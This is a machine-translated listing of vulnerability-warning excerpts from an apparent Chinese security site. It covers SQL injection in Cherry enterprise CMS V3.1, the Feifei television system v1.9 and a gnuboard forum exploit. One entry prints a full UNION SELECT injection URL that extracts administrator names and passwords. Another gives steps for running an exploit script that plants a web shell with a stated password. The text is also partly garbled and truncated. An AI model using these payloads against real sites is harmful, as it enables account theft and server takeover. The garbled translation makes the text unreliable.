Cherry enterprise cms V3. 1 SQL injection and arbitrary administrator account password change. Delete-bug warning-the black bar safety net

Cherry enterprise website management system V3. 1 SQL injectionand any administrator account password to modify. Delete vulnerability Program download address: http://down.chinaz.com/soft/31227.htm Vulnerability file: newscategory. asp Set rs = server. CreateObject"adodb. recordset" sql ="select...

Feifei television system(PHP) v1. 9 injection vulnerability and fix-vulnerability warning-the black bar safety net

Method of use: http://www.xxxx.com /? s=vod-read-id-1%20and%2 0 1=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat0x40,adminid,0x40,adminname,0x40,adminpwd,0x40,2 8,29%20from%20ppadmin--.html And then broke account password,back to their own guess...

South Korea gnuboard Forum vulnerability EXP and method of use-vulnerability warning-the black bar safety net

Excerpt from: the Red section of the network security http://bbs.honkwin.com 1. The machine is set up the PHP environment 2.将EXP程序保存为akt.php 3. CMD is executed under php akt.php 4. Generated akt. txt records in the success URL 5.http://目标URL/data/hardison.php password: akteam with PHP connection...